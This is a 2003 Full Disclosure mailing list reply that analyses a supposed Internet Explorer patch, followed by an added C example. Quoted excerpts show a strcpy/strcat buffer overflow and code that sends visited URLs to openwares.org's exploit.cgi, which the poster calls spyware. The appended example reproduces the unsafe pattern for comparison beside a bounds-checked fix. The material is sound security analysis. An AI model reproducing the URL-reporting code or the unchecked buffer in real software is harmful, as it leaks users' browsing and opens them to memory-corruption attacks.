Full Disclosure mailing list archives
Re: Openware.org IE Fix - Warning
From: petard <petard () freeshell org>
Date: Fri, 19 Dec 2003 14:35:43 +0000
On Fri, Dec 19, 2003 at 01:25:48PM +0100, Thierry wrote:
> According to Heise (http://www.heise.de/newsticker/data/dab-19.12.03-002/) the Openware.org IE fix introduces new flaws:
> - The buffer to copy URLs is limited to 256 bytes.
> - Larger strings produce a buffer overflow, with the possibility to overwrite the stack.
> BoF test: http://www.heise.de/security/dienste/browsercheck/demos/ie/e5_18.shtml (at the bottom, link entitled "TEST DES PATCHES")
DISCLAIMER: I've only read, not executed this source code!

I'd say it's worse than that. From a quick look at the source, I'd say this one may actually be malicious. (Stupid too, but it looks malicious)...

In the BeforeNavigateEvent() function of IETray.cpp, the URL is first truncated to 256 bytes:

    char *dest = (char *)malloc(256*sizeof(char));
    WideCharToMultiByte( CP_ACP, 0, (BSTR)url->bstrVal, -1, dest, 256, NULL, NULL );

Safe enough, I suppose, though it will likely lead to a sub-optimal browsing experience.

Then, if one of the "malicious" characters is found, it allocates and populates the following buffer:

    char surl[256];
    strcpy(surl,"http://www.openwares.org/cgi-bin/exploit.cgi?");

At the end of the function, after determining what the "real" and "fake" URLs were, the code unsafely appends them to the buffer:

    strcat(surl,sFake);
    strcat(surl,"&");
    strcat(surl,sTrue);

Copies the result to another string:

    MultiByteToWideChar( CP_ACP, 0, surl, -1, url, 256 );

And proceeds to send it to the authors of the code (or whomever controls http://www.openwares.org/):

    m_smtWB->Navigate(url,0,0,0,0);

Summary: Not only is there a stupid, possibly exploitable, buffer overflow here, but the place I'm seeing it is in a section of the code whose main purpose appears to be submitting information about what you browse back to the code's authors. I'd say this is malicious... the user is certainly not warned of this prior to downloading the patch. Since I never executed it, I have no idea of whether or not they are warned by an installer.

Call it a trojan, call it spyware, but don't execute it.

Regards,
petard

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
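To make the arithmetic behind the overflow concrete, here is an added example (not code from the Openwares patch or from this thread) that puts the strcpy/strcat pattern described above next to a bounds-checked replacement. The prefix literal and the 256-byte sizes are taken from the mail; the function names, the worst-case length calculation and the constructed inputs are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>

/* Sizes quoted in the mail: the URL is truncated to 256 bytes, and the
 * report is then assembled in a 256-byte stack buffer. */
#define URL_MAX   256
#define REPORT_SZ 256
/* Prefix literal quoted in the mail; only its length matters here. */
#define PREFIX "http://www.openwares.org/cgi-bin/exploit.cgi?"

/* Hypothetical helper: worst-case bytes for PREFIX + fake + '&' + true + NUL
 * when each URL has already been truncated to URL_MAX-1 characters. */
size_t worst_case_report_len(void) {
    return strlen(PREFIX) + (URL_MAX - 1) + 1 + (URL_MAX - 1) + 1;
}

/* The "before": the pattern the mail describes, paraphrased. No length
 * check at all; kept only for comparison and never called below. */
void build_report_unsafe(char surl[REPORT_SZ], const char *fake, const char *tru) {
    strcpy(surl, PREFIX);
    strcat(surl, fake);
    strcat(surl, "&");
    strcat(surl, tru);
}

/* Bounds-checked replacement (hypothetical, not from the Openwares source):
 * snprintf returns the length the full string would need, so n >= outsz
 * means it did not fit; the caller gets -1 and an empty buffer rather than
 * a silently truncated or overflowed one. */
int build_report_safe(char *out, size_t outsz, const char *fake, const char *tru) {
    int n = snprintf(out, outsz, "%s%s&%s", PREFIX, fake, tru);
    if (n < 0 || (size_t)n >= outsz) {
        out[0] = '\0';
        return -1;
    }
    return n;
}

/* Constructed check: two 255-byte URLs that each survived the 256-byte
 * truncation still do not fit the 256-byte report buffer. */
int long_pair_result(void) {
    char longurl[URL_MAX], report[REPORT_SZ];
    memset(longurl, 'a', URL_MAX - 1);
    longurl[URL_MAX - 1] = '\0';
    return build_report_safe(report, sizeof report, longurl, longurl);
}

int main(void) {
    printf("worst case needs %zu bytes, buffer holds %d\n", worst_case_report_len(), REPORT_SZ);
    printf("long pair result: %d\n", long_pair_result());
    return 0;
}
```

The point of worst_case_report_len() is that truncating the input to 256 bytes does nothing for a downstream buffer that must hold the prefix plus two such inputs; only a check on the assembled length protects it.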